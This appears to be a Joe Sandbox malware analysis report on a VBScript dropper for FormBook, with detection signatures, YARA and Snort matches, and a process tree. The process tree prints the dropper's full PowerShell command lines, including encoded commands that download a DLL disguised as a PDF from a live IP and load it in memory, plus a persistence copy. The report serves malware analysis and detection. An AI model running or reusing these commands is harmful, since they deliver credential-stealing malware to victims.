Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
daveCrpted.vbs

Overview

General Information

Sample Name:daveCrpted.vbs
Analysis ID:635407
MD5:dc70eefa088f688d1cd4c4cf2c6674ca
SHA1:c358867a468d9722b3c40f0bcd0cbe2534756545
SHA256:1ec2c2c0a29c16146400c52880e887cfae57223b2b621c0f433ef9b619af5343
Tags:FormbookvbsXloader
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6884 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\daveCrpted.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 7076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6384 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913)
        • powershell.exe (PID: 6508 cmdline: "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
          • conhost.exe (PID: 4364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • RegAsm.exe (PID: 6656 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
          • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • powershell.exe (PID: 6936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
              • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • powershell.exe (PID: 1288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5 MD5: 95000560239032BC68B4C2FDFCDEF913)
              • wscript.exe (PID: 4028 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
                • powershell.exe (PID: 5680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913)
                  • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
                  • powershell.exe (PID: 6516 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913)
                    • RegAsm.exe (PID: 3300 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
            • cmmon32.exe (PID: 6076 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
              • cmd.exe (PID: 6204 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
                • conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • explorer.exe (PID: 2596 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
              • explorer.exe (PID: 4996 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8a38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8dd2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14b65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14611:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14c67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14ddf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x97da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1388c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa552:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a117:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b21a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16f99:$sqlite3step: 68 34 1C 7B E1
    • 0x170ac:$sqlite3step: 68 34 1C 7B E1
    • 0x16fc8:$sqlite3text: 68 38 2A 90 C5
    • 0x170ed:$sqlite3text: 68 38 2A 90 C5
    • 0x16fdb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17103:$sqlite3blob: 68 53 D8 7F 8C
    00000015.00000002.608771918.000002823988E000.00000004.00000800.00020000.00000000.sdmpSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth
    • 0x139d1:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
    00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 40 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.0.RegAsm.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.0.RegAsm.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8a38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8dd2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14b65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14611:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14c67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14ddf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x97da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1388c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa552:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a117:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b21a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.0.RegAsm.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16f99:$sqlite3step: 68 34 1C 7B E1
        • 0x170ac:$sqlite3step: 68 34 1C 7B E1
        • 0x16fc8:$sqlite3text: 68 38 2A 90 C5
        • 0x170ed:$sqlite3text: 68 38 2A 90 C5
        • 0x16fdb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17103:$sqlite3blob: 68 53 D8 7F 8C
        6.2.powershell.exe.12fc82bf280.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          6.2.powershell.exe.12fc82bf280.0.raw.unpackMALWARE_Win_DLAgent09Detects known downloader agentditekSHen
          • 0x1e16:$h1: //:ptth
          • 0xa92ee:$h1: //:ptth
          • 0x15da:$s1: DownloadString
          • 0x15cf:$s2: StrReverse
          • 0x161c:$s3: FromBase64String
          • 0x1587:$s4: WebClient
          Click to see the 51 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:20.106.232.4192.168.2.580497382025011 05/27/22-21:15:31.357258
          SID:2025011
          Source Port:80
          Destination Port:49738
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:20.106.232.4192.168.2.580497782025011 05/27/22-21:16:25.336336
          SID:2025011
          Source Port:80
          Destination Port:49778
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5118.27.122.21649870802031449 05/27/22-21:19:38.241995
          SID:2031449
          Source Port:49870
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5118.27.122.21649870802031412 05/27/22-21:19:38.241995
          SID:2031412
          Source Port:49870
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5118.27.122.21649870802031453 05/27/22-21:19:38.241995
          SID:2031453
          Source Port:49870
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: daveCrpted.vbsReversingLabs: Detection: 12%
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://20.106.232.4/dll/26-05-2022-StartUp.pdfPkAvira URL Cloud: Label: malware
          Source: http://20.106.232.4/rumpe/26-05-2022-StartUp.pdfAvira URL Cloud: Label: malware
          Source: http://20.106.232.4/dll/26-05-2022-StartUp.pdfAvira URL Cloud: Label: malware
          Source: http://20.106.232.4Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: http://2.56.57.22Virustotal: Detection: 8%Perma Link
          Source: 24.0.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.RegAsm.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 24.0.RegAsm.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 24.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.RegAsm.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 24.0.RegAsm.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Binary string: cmmon32.pdb source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000009.00000002.574613863.0000000002C5F000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.469567195.0000000002810000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.574322688.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.471300384.00000000029AD000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: WAUgLeAhDG.pdb source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe
          Source: Binary string: WAUgLeAhDG.pdbH|^| P|_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: ddscfIvqgW.pdb source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop edi

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 20.106.232.4:80 -> 192.168.2.5:49738
          Source: TrafficSnort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 20.106.232.4:80 -> 192.168.2.5:49778
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49870 -> 118.27.122.216:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49870 -> 118.27.122.216:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49870 -> 118.27.122.216:80
          Downloads files with wrong headers with respect to MIME Content-Type
          Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:15:31 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:26:51 GMT ETag: "3aac-5dfeafb144fa1" Accept-Ranges: bytes Content-Length: 15020 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 43 34 51 4e 70 41 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 43 51 41 41 41 41 47 41 41 41 41 41 41 41 41 72 6b 49 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 47 41 41 41 41 41 41 41 41 41 41 43 67 41 41 41 41 41 67 41 41 41 41 41 41 41 41 4d 41 59 49 55 41 41 42 41 41 41 42 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 42 43 41 41 42 4c 41 41 41 41 41 47 41 41 41 4d 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 77 41 41 41 41 63 51 67 41 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 43 41 41 41 45 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 35 30 5a 58 68 30 41 41 41 41 74 43 49 41 41 41 41 67 41 41 41 41 4a 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 47 41 75 63 6e 4e 79 59 77 41 41 41 4d 41 44 41 41 41 41 59 41 41 41 41 41 51 41 41 41 41 6d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 42 41 4c 6e 4a 6c 62 47 39 6a 41 41 41 4d 41 41 41 41 41 49 41 41 41 41 41 43 41 41 41 41 4b 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 51 51 67 41 41 41 41 41 41 41 45 67 41 41 41 41 43 41 41 55 41 58 43 51 41 41 41 67 64 41 41 41 44 41 41 41 41 41 41 41 41 41 47 52 42 41 41 43 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 34 43 4b 41 45 41 41 41 6f 71 48 67 49 6f 41 67 41 41 43 69 71 6d 63 77 4d 41 41 41 71 41 41 51 41 41 42 48 4d 45 41 41 41 4b 67 41 49 41 41 41 52 7a 42 51 41 41 43 6f 41 44 41 41 41 45 63 77 59 41 41 41 71 41 42 41 41 41 42 43 6f 41 41 43 35 2b 41 51 41 41 42 47 38 48 41 41 41 4b 4b 69 35 2b 41 67 41 41 42 47 3
          Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:15:32 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:25:11 GMT ETag: "1a580-5dfeaf520524a" Accept-Ranges: bytes Content-Length: 107904 Content-Type: application/pdf Data Raw: e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c 